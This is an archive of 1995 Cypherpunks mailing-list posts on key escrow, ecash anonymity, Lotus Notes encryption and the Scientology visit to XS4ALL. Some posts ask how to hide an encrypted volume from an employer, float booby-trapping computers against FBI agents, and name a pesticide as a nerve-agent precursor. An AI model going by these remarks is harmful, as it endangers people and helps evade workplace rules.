There's nothing in here that specifically excludes dividing your keys among multiple escrow agents; I assume this is still an open issue, or that it goes without saying (one way or the other).

#3 and #6 make it impossible to prevent LE from reading messages from before or after their legally authorized window. This is clearly broken. Again, this appears to be trying to put all the power in the hands of LE to the detriment of the people.
It's advertised as a compromise, but I see nothing gained over Clipper I. The only differences appear to be that the escrow agent(s) may be private instead of government, and the algorithms may be something other than SKIPJACK as long as they are at least 16 bits weaker as well as being known algorithms. It also doesn't address the main problem with Clipper I: that it wouldn't work, since (like Clipper I) it will catch only crooks who are smart enough to encrypt but stupid enough to encrypt with a system they (should) know LE can read -- probably a null set. If, on the other hand, this is made mandatory for encrypted transmissions, it will create a new and unnecessary class of criminals, probably including myself (though I won't promise to break any laws at this point).

This really burns me up. What do they think they're doing here? Am I missing a big piece of it?

Jim Gillogly Hevensday, 14 Halimath S.R. 1995, 22:02

From tunny at Inference.COM Tue Sep 5 15:13:33 1995
From: tunny at Inference.COM (James A. Tunnicliffe)
Date: Tue, 5 Sep 95 15:13:33 PDT
Subject: VCRPLUS Huffman code
Message-ID: <304CCA55@smtp-pc>

>On Tue, 5 Sep 1995, Peter Trei wrote:
>
>> > Has anyone worked out the VCRPLUS code?
>>
>> Code which implemented this partial crack was published on the net,
>> and the VCR+ people got very upset about it - apparently they make
>
> I believe the code is in the cookbook archive at ftp.ee.ualberta.ca,
>but when I just tried to confirm I got timeouts.
>
> Brian

Among many other places, you can get this off my Web page, in: http://www.inference.com/~tunny/crypto/primer.html

- Tunny
______________________________________________________________________
James A.
Tunnicliffe | WWWeb: http://www.inference.com/~tunny
Inference Corporation | PGP Fingerprint: CA 23 E2 F3 AC 2D 0C 77
tunny at Inference.com | <--finger for key 36 07 D9 33 3D 32 53 9C
======================================================================

From hallam at w3.org Tue Sep 5 15:23:36 1995
From: hallam at w3.org (hallam at w3.org)
Date: Tue, 5 Sep 95 15:23:36 PDT
Subject: SSLRef (SSLtelnet)
In-Reply-To: <199509051940.VAA26244@utopia.hacktic.nl>
Message-ID: <9509052222.AA31819@zorch.w3.org>

>Is it possible that since this was only a "test" CA, that Netscape used
>less than a full-strength key? If it was only 512 bits or so, we could
>try cracking it.

Netscape's test cert is for a 1024-bit key

Phill

From jsimmons at goblin.punk.net Tue Sep 5 16:02:55 1995
From: jsimmons at goblin.punk.net (Jeff Simmons)
Date: Tue, 5 Sep 95 16:02:55 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To:
Message-ID: <199509052300.QAA21504@goblin.punk.net>

> 
> 
> > Here's a prediction: within one year, we will see the advent of Micro$oft's
> > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by
> > Micro$oft itself, or a flat-out trap door. ANY communications with a
> > Windoze box or network will have to use it, or lose the market.
> Black Unicorn wrote:
> 
> It's here already.
> It's called "lotus notes."
> 

So what form of GAK or trap-door does lotus notes contain?

-- Jeff Simmons jsimmons at goblin.punk.net

From skaplin at mirage.skypoint.com Tue Sep 5 16:04:54 1995
From: skaplin at mirage.skypoint.com (Sam Kaplin)
Date: Tue, 5 Sep 95 16:04:54 PDT
Subject: Police and scientology visit XS4ALL Amsterdam
Message-ID:

From: XS4ALL Internet
Postbus 22864
1100 DJ Amsterdam
tel: +31 20 6222885
fax: +31 20 6222753

PRESS RELEASE
-------------

Police and members of Scientology church enter offices of XS4ALL
================================================================

Amsterdam - Tuesday, September 5, 1995.
Today at about 14:00, XS4ALL was visited by Mr. S. Braan, bailiff. He was acting on behalf of the Religious Technology Centre, better known as the Scientology Church, or Scientology for short. He was assisted by a local police officer and Mr. Hermans from the 'Nauta-Dutilh' legal firm that represents Scientology in The Netherlands. Also present were two computer experts (Mr. Ootjes and Mr. Van Suchtelen), a locksmith (to enter had we not been present) and two American employees of Scientology, Mr. Weightman and Ms. Jenssen. Scientology is filing for seizure of XS4ALL's computer equipment. Under Dutch law, this means that a bailiff comes in to record your assets. In real life, the computer experts that were present have recorded the types and serial numbers of all the computers in our offices. They did not take any equipment; the continuity of XS4ALL's services is not in jeopardy.

What is this all about?
-----------------------

The Scientology Church claims that the XS4ALL anonymous remailer was used to disseminate documents over the Internet to which the church holds the legal copyright. This has led the church to ask the president of the district court of Amsterdam to grant permission for this seizure as a prelude to legal procedures concerning damages suffered by the church. The remailer in question was disabled more than 2 months ago. During the visit of Scientology to XS4ALL this afternoon, the remailer was not the subject of any conversation. The organisation seemed totally preoccupied with the information about Scientology that one of our users has put on his home page. Part of this information is said to be a file to which Scientology holds the copyright. If we were to delete the file in question on the spot, they were willing to drop the seizure.

Responsibility of Internet Providers
------------------------------------

XS4ALL categorically denies any responsibility for contents of users' homepages.
The users decide for themselves what is on their homepage. Since XS4ALL does not edit the homepages and has no mechanism of control over the contents, we strongly feel that the users themselves are responsible for what they say on their homepage. This whole affair demonstrates the need for clarity concerning the legal position of Internet Providers. We are shocked that our offices can be invaded by freshly flown-in U.S. cult members. If we as Internet providers are held responsible for what our users say, that will undoubtedly kill freedom of speech on the net.

Scare-tactics
-------------

XS4ALL is not alone in receiving this kind of attention from Scientology. Scientology, a semi-religious multinational, is at war with a number of people on the Internet. A non-organized group of people on the net has started to openly discuss the activities of the church. Until recently, the church has always managed to suppress critical voices by means of sheer intimidation and by engaging in endless legal battle. One of the people that Scientology has a problem with is 'fonss', an XS4ALL user that publishes the F.A.C.T.-net Kit on his home page (http://www.xs4all.nl/~fonss). This kit (which can be found on numerous homepages all over the Internet) consists of a large number of documents that show the true face of Scientology. One of these documents is a piece to which Scientology supposedly holds the copyright and which has been added to the kit without the church's permission.
Additional information can be found on the Internet:
http://www.cybercom.net/~rnewman/scientology/home.html
http://www.xs4all.nl/~fonss
news:alt.religion.scientology
news:alt.censorship
news:alt.clearing.technology

From hfinney at shell.portal.com Tue Sep 5 16:11:53 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 5 Sep 95 16:11:53 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <199509052310.QAA10027@jobe.shell.portal.com>

From: shamrock at netcom.com (Lucky Green)
> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in
> its current form, the only version David Chaum is willing to license, is
> fully traceable. Popular Cypherpunk myths notwithstanding.
> 
> First, the recipient of funds is non-anonymous by design. Second, any payer
> can trivially make the recipient of an ecash note known by revealing the
> blinding factor. For purposes of law enforcement, DigiCash's ecash is no
> more secure than if the (insert horseman here) billed his fees to a credit
> card.

This is not completely correct; there is a degree of anonymity in DigiCash's ecash. That is anonymity of how a person spends his money. Neither the bank nor the payor is in a position to learn who or where a particular piece of ecash comes from (assuming that anonymous communication means are used). This is not trivial anonymity. IMO the greatest privacy threat posed by credit cards is exactly this, the tracking of spending information and patterns. With credit card payments a great deal of information can be learned by the credit card company about what I do. With ecash almost no information is learned, only the raw amounts I spend. And if I occasionally make payments to myself even that is blurred. Ecash is not all that we might hope it could be but it is more than a myth that it allows untraceable transactions.
Hal

From unicorn at access.digex.net Tue Sep 5 16:13:55 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 5 Sep 95 16:13:55 PDT
Subject: NSA says Joe Sixpack won't buy crypto
In-Reply-To: <199509052300.QAA21504@goblin.punk.net>
Message-ID:

On Tue, 5 Sep 1995, Jeff Simmons wrote:

> Date: Tue, 5 Sep 1995 16:00:38 -0700 (PDT)
> From: Jeff Simmons
> To: cypherpunks at toad.com
> Subject: Re: NSA says Joe Sixpack won't buy crypto
> 
> > 
> > 
> > > Here's a prediction: within one year, we will see the advent of Micro$oft's
> > > "Not So Bad Privacy". It'll be a secret algorithm with either GAK done by
> > > Micro$oft itself, or a flat-out trap door. ANY communications with a
> > > Windoze box or network will have to use it, or lose the market.
> > Black Unicorn wrote:
> > 
> > It's here already.
> > It's called "lotus notes."
> > 
> So what form of GAK or trap-door does lotus notes contain?

No, it's just been so weak before the current implementation of RC4 (and note the export version still has 40 bits) that it might as well be nothing.

> 
> -- 
> Jeff Simmons jsimmons at goblin.punk.net
> 

00B9289C28DC0E55 nemo repente fuit turpissimus - potestas scientiae in usu est
E16D5378B81E1C96 quaere verum ad infinitum, loquitur sub rosa - wichtig!
*New Key Information* - Finger for key revocation and latest key update.

From anon-remailer at utopia.hacktic.nl Tue Sep 5 17:25:23 1995
From: anon-remailer at utopia.hacktic.nl (Anonymous)
Date: Tue, 5 Sep 95 17:25:23 PDT
Subject: Secure Device 1.4 Question
Message-ID: <199509060025.CAA05098@utopia.hacktic.nl>

I just installed Secure Device, v1.4 on a PC at work. After installing it, I looked at the encrypted volume and found the string "SECDEV " starting at the fourth byte of the file. I'd prefer that this file look like some temporary file that got left on the disk by a program that didn't clean up properly after itself, and not be identifiable as an encrypted volume.
Is there a way to get Secure Device to not leave identifiable plaintext like that in the file? Will I do any harm to the file if I replace that string with blanks, or something more innocuous? If it's required to be there, then I'd like to put its removal on the "wish list" for the next version. (I copied the file, replaced the string "SECDEV" with blanks using a hex editor, and then mounted the copy as an encrypted volume, and it seems to be working OK, but I wanted to make sure this won't cause unforeseen problems in the future.)

As you've probably guessed, I'm not supposed to have any personal files on my work computer, and an entire encrypted volume would undoubtedly make someone go ballistic if they discovered it. When I want to use my encrypted file system, I reboot off of a floppy, and all Secure Device programs and drivers are kept on the floppy. The only thing that has to be left on the hard drive is the encrypted volume itself.

Please post a copy of any replies to the Cypherpunks mailing list at "cypherpunks at toad.com". Thanks.

From mfroomki at umiami.ir.miami.edu Tue Sep 5 17:27:53 1995
From: mfroomki at umiami.ir.miami.edu (Michael Froomkin)
Date: Tue, 5 Sep 95 17:27:53 PDT
Subject: Emergency File Wipe Algorithim
In-Reply-To: <9509052120.AA02633@ch1d157nwk>
Message-ID:

On Tue, 5 Sep 1995, Andrew Loewenstern wrote:
[...]
> 
> BTW, this is not a troll and I know that the possible constitutionality of
> court-ordered disclosure of passphrases or key-material has been hashed over
> many times in the past here, but have any cases with this particular
> attribute gone through court yet? There were reports even years ago of

AFAIK no reported cases.

A. Michael Froomkin | +1 (305) 284-4285; +1 (305) 284-6506 (fax)
Associate Professor of Law | mfroomki at umiami.ir.miami.edu
U. Miami School of Law | P.O. Box 248087 | It's hot here. And humid.
Coral Gables, FL 33124 USA | See (experimentally & erratically) http://viper.law.miami.edu/~mfroomki

From stevenw at iglou.com Tue Sep 5 18:16:49 1995
From: stevenw at iglou.com (Steven Weller)
Date: Tue, 5 Sep 95 18:16:49 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID:

> Black Unicorn posted a very interesting info summary on the subject of foreign state US$$ forgery.
>
> This is a story I heard, long ago, from a Brit, Mr Waterlow, about something that happened to his grandfather, chairman of the Waterlow bank:
>
> Early in this century Portugal didn't print its own money but contracted this job to the Waterlow Bank in England. Some skilled conmen succeeded in making the bank believe they were representatives of the Portuguese National Bank. Then they ordered a huge amount of new bills and got away (at least for some time) with it.

'Tis all in a book: "The Man Who Stole Portugal". I picked it up for about $2 in a bookstore a few months ago. Very much worth a read. An incredibly audacious escapade.

-------------------------------------------------------------------------
Steven Weller             | "The Internet, of course, is more
                          | than just a place to find pictures
Windsor Consulting Group  | of people having sex with dogs."
stevenw at iglou.com      | -- Time Magazine, 3 July 1995

From wilcoxb at nagina.cs.colorado.edu Tue Sep 5 18:32:19 1995
From: wilcoxb at nagina.cs.colorado.edu (Bryce Wilcox)
Date: Tue, 5 Sep 95 18:32:19 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To:
Message-ID: <199509060132.TAA04511@nagina.cs.colorado.edu>

Lucky Green wrote:

> This is unnecessary, since there is no "true" ecash. DigiCash's ecash in its current form, the only version David Chaum is willing to license, is fully traceable. Popular Cypherpunks' myths notwithstanding.
>
> First, the recipient of funds is non-anonymous by design.
> Second, any payer can trivially make the recipient of an ecash note known by revealing the blinding factor. For purposes of law enforcement, DigiCash's ecash is no more secure than if the (insert horseman here) billed his fees to a credit card.

I'm sorry-- what do you mean by "the recipient of funds is non-anonymous"? I cannot envision any centralized currency system in which a user's funds were *not* known to the bank!

Secondly, there is a tremendous difference between a person being able to identify you as the recipient of their money (which they can pretty much do anyway, with less surety, just by saying "That's him! He's the one I gave it to!") and a third party such as the bank or a government being able to monitor all your transactions. For such an organization to perform that feat on a DigiCash user they would need the cooperation of all of the people with whom he exchanges currency, and if they have that, then cryptography seems irrelevant. :-)

I hope I'm not missing anything here.

Regards,

Bryce

signatures follow: + public key on keyservers /. island Life in a chaos sea or via finger 0x617c6db9 / bryce.wilcox at colorado.edu ---*

From shamrock at netcom.com Tue Sep 5 18:55:45 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:55:45 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <199509060153.VAA14379@book.hks.net>

In article <199509052310.QAA10027 at jobe.shell.portal.com>, hfinney at shell.portal.com (Hal) wrote:

> This is not completely correct; there is a degree of anonymity in DigiCash's ecash.
> That is anonymity of how a person spends his money. Neither the bank nor the payor is in a position to learn who or where a particular piece of ecash comes from (assuming that anonymous communication means are used).

So it is harder to compile dossiers on people. Big deal. The recipient can still determine who gets the goods paid for by the "anonymous" ecash by conventional means (hint: shipping address), so the payee anonymity is of little value as far as protecting the privacy of the payer (most likely the recipient of the goods) is concerned.

Ecash of course is of *no* value for the various assassination markets, drug dealing, money laundering, etc. that routinely get mentioned in the same paragraph as Ecash. The reason is the *full traceability* of the payee that has been deliberately built into the current version of Ecash. A "feature" that you may rest assured will be part of all future versions backed by anyone with even marginal reputation in the financial markets.

-- Lucky Green
PGP encrypted mail preferred.

[This message has been signed by an auto-signing service. A valid signature means only that it has been received at the address corresponding to the signature and forwarded.]

From shamrock at netcom.com Tue Sep 5 18:57:30 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:30 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
Message-ID:

At 23:09 9/5/95, announce wrote:

[...]
> Police and members of Scientology church enter offices of XS4ALL
> ================================================================

I am wondering about the legalities of booby trapped computer equipment. Would it be legal if a clear warning to the fact was posted on the hardware?
Interesting side note: a few months ago, several hundred 5 gallon containers of insecticide were stolen from the lot of an agricultural supply dealer here in California. The incident made a small note in the SF Chronicle. It was mentioned that the FBI is taking part in the investigation.

What wasn't mentioned was that this insecticide is an ideal precursor to various forms of neurotoxins, namely Tabun and Soman, two types of nerve gas so vicious and toxic that even Hitler refused to approve their use. I predict that eventful times are just around the corner.

-- Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Tue Sep 5 18:57:33 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:57:33 PDT
Subject: Emergency File Wipe Algorithm
Message-ID:

At 15:47 9/5/95, Sameer R Manek wrote:

> > May I also point out that the rules of economics do not apply to the federal government, since it insists - quite successfully - on having a monopoly on using lethal force to extract arbitrarily large amounts from hundreds of millions of working Americans?
>
> How do you figure the above? You only get to go to jail if you don't pay taxes...then you can't pick up the soap.

If you aren't willing to pay your taxes, which by the way are nothing but forced labor for a large part of the year, it is unlikely that you are willing to spend the same or more forced time manufacturing license plates. If you resist that kidnapping and introduction into a slave labor camp that follows a "conviction" for not paying your taxes you will be forced to comply. If you then resist that force you will be killed.

Chisel it in granite: the ultimate threat by which any government compels compliance is _always_ lethal force.

-- Lucky Green
PGP encrypted mail preferred.
From shamrock at netcom.com Tue Sep 5 18:58:05 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 18:58:05 PDT
Subject: Another Son of Clipper discussion paper
Message-ID:

At 16:36 9/5/95, Mike McNally wrote:

> If the algorithm is public (and to stretch a point, if the executable makes it onto somebody's hard disk, it's effectively public), I don't really understand how the above can be made a realistic goal.

Windows 95 is on a lot of people's hard drives. It is therefore public and available for everyone's inspection. How many people do you know that have reverse engineered Windows 95? How many of those use a reverse engineered version? I'd venture it is zero out of zero.

-- Lucky Green
PGP encrypted mail preferred.

From Tweetpunk at aol.com Tue Sep 5 19:14:05 1995
From: Tweetpunk at aol.com (Tweetpunk at aol.com)
Date: Tue, 5 Sep 95 19:14:05 PDT
Subject: Key Certification by US Post Office
Message-ID: <950905221353_11856933@mail02.mail.aol.com>

Copious apologies if this is old news, but I just got a chance to read some mags from the last few weeks:

An article in *The Economist* (August 5th-11th 1995, p. 56) reports that the United States Postal Service has plans to offer *electronic certificates of identity encoded to prevent forgery*. It goes on to say that they are working with the usual suspects (Microsoft and Lotus/IBM) to get appropriate software included in their products. Future services include timestamping, multimedia kiosks in post office lobbies and e-mail print out and delivery services (for the connectivity challenged).

I guess this puts a new twist on saying that PGP is an envelope for your e-mail.

-------
Greg Anders
tweetpunk at aol.com

To have loved and lost like Patsy Cline, it is better to have never loved at all.
From pfarrell at netcom.com Tue Sep 5 19:33:24 1995
From: pfarrell at netcom.com (Pat Farrell)
Date: Tue, 5 Sep 95 19:33:24 PDT
Subject: NSA says Joe Sixpack won't buy crypto
Message-ID: <80607.pfarrell@netcom.com>

Black Unicorn writes:

> On Tue, 5 Sep 1995, Jeff Simmons wrote:
> > So what form of GAK or trap-door does lotus notes contain?
> No, it's just been so weak before the current implementation of RC4 (and note the export version still has 40 bits) that it might as well be nothing.

Uni is right. Notes used RSA, which starts out fine, but it has nothing like PGP's passphrase to protect the private key. You can simply copy the "username.ID" file, and you can sign and encrypt messages with "username"'s nym.

Of course, Corporate America loves Notes, which is why IBM bought it.

Weak encryption for weak minds.

Pat

Pat Farrell Grad Student http://www.isse.gmu.edu/students/pfarrell
Info. Systems & Software Engineering, George Mason University, Fairfax, VA
PGP key available on homepage #include

From tcmay at got.net Tue Sep 5 20:17:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:17:51 PDT
Subject: Lotus Notes vs. the Web and the Net
Message-ID:

At 2:23 AM 9/6/95, Pat Farrell wrote:

> Of course, Corporate America loves Notes, which is why IBM bought it.
>
> Weak encryption for weak minds.

It may also signal that Lotus Notes has peaked, as IBM has a knack for "buying at the top." Interestingly, the current issue of "Wired" (morphed Aryanized OJ) says that Lotus Notes is tired, and Web-based groupware is wired.

On this one I agree...and I've said this here on this list. Local groups, such as university departments, corporate departments, even entire corporations, can use the Web/Net in ways similar to what Lotus Notes provides (using their own LANs, or even the Internet, with suitable security steps).
Granted, Lotus Notes currently has more stuff oriented towards groupware (from what I've been reading for several years, as I'm not a user), but I'd expect a huge amount of work on Netscape and similar browsers, and other Net systems, will make the Web/Net a more common groupware platform. I don't know this is so, but this is where I'd bet money.

No way would I pay $3 billion for Lotus Notes!

--Tim May

---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From tcmay at got.net Tue Sep 5 20:38:15 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 5 Sep 95 20:38:15 PDT
Subject: Are booby-trapped computers legal?
Message-ID:

(I've changed the name of this thread.)

At 2:30 AM 9/6/95, Lucky Green wrote:

> I am wondering about the legalities of booby trapped computer equipment. Would it be legal if a clear warning to the fact was posted on the hardware?

There are two types of "booby traps" to consider:

* Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and when a burglar enters. Or an electrified region of a room is set to "get energized" when an intruder enters. These are "surprises" and are canonical booby traps.

These have been found to be illegal in several court cases. (I'm not a lawyer, but I've been reading about them for 20 years. Famous cases where a burglar sued, and won, because he was injured when breaking into a house.)

* Type 2 Booby Trap: electrified perimeter fences. So long as these are adequately marked ("If you touch this fence, you will probably die"), and are not public nuisances where children and pets will inadvertently validate Darwin's theory, these are--I think--legal.
There may be license fees required, to build an electrified fence, but I think it is possible to build a lethal voltage electrified fence on one's property.

Thus, I suspect it is fully legal to build an electrified fence around one's PC, providing suitable warnings are included.

I would not call the second type a real booby trap, though some courts might, depending. A properly labelled electrified fence seems legal, on one's own property, but may not be. And certainly I think any explosive-rigged system is illegal, for explosives reasons if not for booby trap reasons.

I know of no case law on this, and suspect that if an FBI agent were to be electrocuted or blown up upon trying to open/use/disconnect the PC, even with clear warnings, that a prosecution would happen. Results are unclear (to me).

(I think that if an FBI agent were to be electrocuted while climbing on a clearly labelled electrified fence, no prosecution would result.)

Of course, if a PC were to be clearly labelled as being rigged, then steps could presumably be taken to defuse the arrangement.

> Interesting side note: a few months ago, several hundred 5 gallon containers of insecticide were stolen from the lot of an agricultural supply dealer here in California. The incident made a small note in the SF Chronicle. It was mentioned that the FBI is taking part in the investigation.
>
> What wasn't mentioned was that this insecticide is an ideal precursor to various forms of neurotoxins, namely Tabun and Soman, two types of nerve gas so vicious and toxic that even Hitler refused to approve their use. I predict that eventful times are just around the corner.

As Lucky knows, I live out in the country. I agree that some "muckers" (R.I.P. John Brunner) are likely to mount assaults on urban centers. Bad news for some.
But then the good news is that the threat of nuclear annihilation has all but gone away completely, and that cancels out an awful lot of the minor bad news items the scribblers keep telling us are so awful.

--Tim May

From shamrock at netcom.com Tue Sep 5 20:47:45 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:47:45 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID:

At 19:32 9/5/95, Bryce Wilcox wrote:

> I hope I'm not missing anything here.

Only that Ecash has no benefits for transactions that are of an illegal nature. The meaning of "illegal" is of course increasing as new laws are passed every session of the legislature.

-- Lucky Green
PGP encrypted mail preferred.

From shamrock at netcom.com Tue Sep 5 20:48:03 1995
From: shamrock at netcom.com (Lucky Green)
Date: Tue, 5 Sep 95 20:48:03 PDT
Subject: Growth of actions defined as crime. Which math formula?
Message-ID:

With every session of Congress, previously legal acts become illegal. Has anyone worked out a function of this growth (number of crimes in the books vs. time)? I am not looking at the numbers of laws passed, but at individual acts that are defined to be illegal. If this has been studied, what is the formula? If anyone with access to more appropriate lists could please give me a pointer/forward the post there, I'd be grateful.

TIA,

-- Lucky Green
PGP encrypted mail preferred.
From unicorn at access.digex.net Tue Sep 5 20:57:27 1995
From: unicorn at access.digex.net (Black Unicorn)
Date: Tue, 5 Sep 95 20:57:27 PDT
Subject: Growth of actions defined as crime. Which math formula?
In-Reply-To:
Message-ID:

On Tue, 5 Sep 1995, Lucky Green wrote:

> Date: Tue, 5 Sep 1995 20:50:44 -0800
> From: Lucky Green
> To: cypherpunks at toad.com
> Subject: Growth of actions defined as crime. Which math formula?
>
> With every session of Congress, previously legal acts become illegal. Has anyone worked out a function of this growth (number of crimes in the books vs. time)? I am not looking at the numbers of laws passed, but at individual acts that are defined to be illegal. If this has been studied, what is the formula? If anyone with access to more appropriate lists could please give me a pointer/forward the post there, I'd be grateful.
>
> TIA,
>
> -- Lucky Green
> PGP encrypted mail preferred.

Really it's hard to answer this because what constitutes a "NEW" act is a real question in and of itself. For example, wire fraud. Is it a "NEW" crime? Or just a subset of fraud, or mail fraud? Carjacking... is that a new offense? Or just a solidification and increase of punishment for armed robbery, unauthorized use of a motor vehicle, possession of stolen property, and grand theft auto? Check forgery now has its own offense, but is this distinct from forgery?

Most "new offenses" are simply re-classifications of old offenses or efforts to move them into the federal arena. I think the conception that entirely new acts are often made illegal (excepting burning the flag or some such) is an erroneous one.
From alt at iquest.net Tue Sep 5 21:12:02 1995
From: alt at iquest.net (Al Thompson)
Date: Tue, 5 Sep 95 21:12:02 PDT
Subject: SUMMARY: Not-so-volatile volatile memory
Message-ID:

At 11:54 AM 9/5/95 +0200, Anonymous wrote:

> Is this a new discovery? When I used to work with DOD classified data, not so long ago, disk drives had to be declassified using an approved program, such as Norton Utilities' "WIPEINFO". (That was approved up through the SECRET/SAR level, anyway. I don't know about TS/SCI/SI.) But those same regulations said that RAM was considered declassified within a certain time (30 seconds, I think) after power was removed. (That time figure was UNclassified, BTW.) I think it was just to allow time for the voltage to bleed off of the power supply's filter capacitors, and not related to the relative volatility of DRAM.

I worked at a DoD contractor for a while, and there was a DoD-approved method of disposing of hard drives, which was expensive, laborious, and rather silly. We just had two witnesses watch as we smashed it to smithereens (technical term) with a sledge hammer, and then handed the parts over to an approved disposal person (trash man). It's JUST that easy.

From futplex at pseudonym.com Tue Sep 5 21:13:12 1995
From: futplex at pseudonym.com (Futplex)
Date: Tue, 5 Sep 95 21:13:12 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
In-Reply-To: <199509060153.VAA14379@book.hks.net>
Message-ID: <9509060413.AA00437@cs.umass.edu>

Lucky Green writes:

> The recipient can still determine who gets the goods paid for by the "anonymous" ecash by conventional means (hint: shipping address),

...unless the goods are data.

-Futplex
mailto:futplex at pseudonym.com

From ravage at einstein.ssz.com Tue Sep 5 21:14:42 1995
From: ravage at einstein.ssz.com (Jim Choate)
Date: Tue, 5 Sep 95 21:14:42 PDT
Subject: Are booby-trapped computers legal?
In-Reply-To:
Message-ID: <199509060419.XAA04296@einstein.ssz.com>

> There are two types of "booby traps" to consider:
>
> * Type 1 Booby Trap: a shotgun is placed inside a home, set to fire if and when a burglar enters. Or an electrified region of a room is set to "get energized" when an intruder enters. These are "surprises" and are canonical booby traps.
>
> These have been found to be illegal in several court cases. (I'm not a lawyer, but I've been reading about them for 20 years. Famous cases where a burglar sued, and won, because he was injured when breaking into a house.)

These are completely illegal in Texas and Florida for sure. To make such devices legal the state legal system has to equate property value to parity with life. See below for further comment on this.

> * Type 2 Booby Trap: electrified perimeter fences. So long as these are adequately marked ("If you touch this fence, you will probably die"), and are not public nuisances where children and pets will inadvertently validate Darwin's theory, these are--I think--legal. There may be license fees required, to build an electrified fence, but I think it is possible to build a lethal voltage electrified fence on one's property.
>
> Thus, I suspect it is fully legal to build an electrified fence around one's PC, providing suitable warnings are included.

As far as I know the owner of property has no legal right to kill a person either trespassing or stealing it in any of the 50 states. There was a recent federal ruling that basically says that if you meet a burglar in your home at night you can not kill or otherwise harm them unless your life is directly threatened. In short, you MUST give up the ground if at all possible. Federal and all 50 states (as far as I have been able to determine) rule human life to have an inherently higher value than property of any type (this does not apply to government institutions).
In Texas and all other cattle states that I am aware of, there are specific laws that limit how much voltage and current capacity an electrified fence can have. These laws specifically prohibit any form of lethal installation. There is no license required nor do you have to mark the fences as electrified.

To address the issue of premeditation in regards to this sort of system, does attempted murder ring any bells? If the officer(s) have warrants (and it is not up to the accused to decide that issue at any time) and you refuse to assist them you are guilty of a crime (justifiably so).

> I would not call the second type a real booby trap, though some courts might, depending. A properly labelled electrified fence seems legal, on one's own property, but may not be. And certainly I think any explosive-rigged system is illegal, for explosives reasons if not for booby trap reasons.

I don't know what you call it but if nothing else it is ethically and morally reprehensible.

> I know of no case law on this, and suspect that if an FBI agent were to be electrocuted or blown up upon trying to open/use/disconnect the PC, even with clear warnings, that a prosecution would happen. Results are unclear (to me).
>
> (I think that if an FBI agent were to be electrocuted while climbing on a clearly labelled electrified fence, no prosecution would result.)

Of course not, the FBI as SOP turn the electricity, water, etc. off prior to assaults. In either case the person responsible for the electrification would find themselves in court facing some nasty charges. The law does not recognize the awareness of the victim in these types of cases. It in general falls to the owner/operator to ensure safe operating conditions. In the case of electrification this would mean current limiting on the power supply such that no permanent damage would result to the hapless.
From frissell at panix.com Tue Sep 5 21:29:06 1995
From: frissell at panix.com (Duncan Frissell)
Date: Tue, 5 Sep 95 21:29:06 PDT
Subject: Scientology and police visit XS4ALL Amsterdam
In-Reply-To:
Message-ID:

On Tue, 5 Sep 1995, Lucky Green wrote:

> I am wondering about the legalities of booby trapped computer equipment. Would it be legal if a clear warning to the fact was posted on the hardware?

Generally not. If you can kill the cops anyway (legally, I mean) you might get away with it but remember, Kunstler is dead now so getting a good defense might be tough.

DCF

From tcmay at got.net Tue Sep 5 21:31:51 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 5 Sep 95 21:31:51 PDT
Subject: Are booby-trapped computers legal?
Message-ID:

At 4:19 AM 9/6/95, Jim Choate wrote:

> > Thus, I suspect it is fully legal to build an electrified fence around one's PC, providing suitable warnings are included.
>
> As far as I know the owner of property has no legal right to kill a person either trespassing or stealing it in any of the 50 states. There was a recent federal ruling that basically says that if you meet a burglar in your home at night you can not kill or otherwise harm them unless your life is directly threatened. In short, you MUST give up the ground if at all possible. Federal and all 50 states (as far as I have been able to determine) rule human life to have an inherently higher value than property of any type (this does not apply to government institutions).

Well, I wasn't saying one had a legal right to kill a person either trespassing or stealing, I was saying that electrified fences carrying lethal voltages are extant. How they got that way, and what licenses are involved, is unknown to me. But they do exist.

> In Texas and all other cattle states that I am aware of, there are specific laws that limit how much voltage and current capacity an electrified fence can have. These laws specifically prohibit any form of lethal installation.
> There is no license required nor do you have to mark the fences as electrified.

Cattle fences are not what I was talking about. I have an electrified fence on one side of my property, to keep the deer away. Lethal voltage fences, to keep humans out, are another matter.

....

> I don't know what you call it but if nothing else it is ethically and morally reprehensible.

Different strokes for different folks. Anyone entering my house unannounced faces lethal response. I think of it as evolution in action, and doubt I would lose any sleep over this. It has nothing to do with equating human life over property, it has to do with defending one's property and (maybe) one's life. Here in California, it is becoming more and more common for "home invasions" to be followed by execution of all of the witnesses. (Read "The San Jose Mercury News" for accounts of gang invasions in which all the residents in a home are lined up and shot, execution-style.)

I won't get into a discussion of which states permit lethal force responses, as this is a topic which even I think belongs in talk.politics.guns or similar fora. Suffice it to say that most states allow lethal response under threatening circumstances.

--Tim May

From hfinney at shell.portal.com Tue Sep 5 21:33:34 1995
From: hfinney at shell.portal.com (Hal)
Date: Tue, 5 Sep 95 21:33:34 PDT
Subject: Forgery, bills, and the Four Horsemen (Articles and Comment)
Message-ID: <199509060432.VAA05003@jobe.shell.portal.com>

